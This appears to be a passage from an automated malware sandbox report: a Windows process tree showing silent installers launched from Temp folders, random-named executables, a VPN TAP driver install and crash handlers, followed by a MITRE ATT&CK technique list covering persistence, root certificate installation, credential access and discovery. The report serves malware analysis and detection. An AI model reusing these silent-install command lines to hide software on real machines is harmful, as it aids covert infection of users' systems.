        C:\Windows\System32\cmd.exe
        5⤵
        
        PID:3592
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 1460
    3⤵
    - Program crash
    PID:2296

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2572
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C2E92D4D8A12073D2378F0DB2DE15B1E C
  2⤵
  PID:5440
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9A9D8E51137739064B62DD9A1FD40ED0
  2⤵
  PID:6696

C:\Users\Admin\AppData\Local\Temp\is-NU2FH.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NU2FH.tmp\irecord.tmp" /SL5="$502D6,6265333,408064,C:\Program Files\Google\JTMFWPFIPU\irecord.exe" /VERYSILENT
1⤵
PID:6988

C:\Users\Admin\AppData\Local\Temp\is-HU0EA.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HU0EA.tmp\prolab.tmp" /SL5="$504B8,575243,216576,C:\Program Files\Windows Multimedia Platform\FKVSOPLQFH\prolab.exe" /VERYSILENT
1⤵
PID:4748

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4236

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6332

C:\Users\Admin\AppData\Local\Temp\is-7GFG7.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7GFG7.tmp\Setup3310.tmp" /SL5="$704A0,138429,56832,C:\Users\Admin\AppData\Local\Temp\mpugljkujbo\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:4184
- C:\Users\Admin\AppData\Local\Temp\is-5GUG1.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-5GUG1.tmp\Setup.exe" /Verysilent
  2⤵
  PID:5244

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7464

C:\Users\Admin\AppData\Local\Temp\is-DQ2GE.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-DQ2GE.tmp\win1host.exe" 535
1⤵
PID:7508

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8164

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:6972
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{546bb76d-85fc-1f43-a5ff-ca356b3b7858}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:6228
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"
  2⤵
  PID:5608

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7376

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:5012

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:4772

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7732

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7428

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4468

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:804

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7240

C:\Users\Admin\AppData\Local\Temp\DBCC.exe
C:\Users\Admin\AppData\Local\Temp\DBCC.exe
1⤵
PID:8524

C:\Users\Admin\AppData\Local\Temp\E1B8.exe
C:\Users\Admin\AppData\Local\Temp\E1B8.exe
1⤵
PID:8876

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8212

C:\Users\Admin\AppData\Local\Temp\E09.exe
C:\Users\Admin\AppData\Local\Temp\E09.exe
1⤵
PID:6968

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\383b6933897b4e58afb535d87fea4f30 /t 8376 /p 7240
1⤵
PID:8232

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery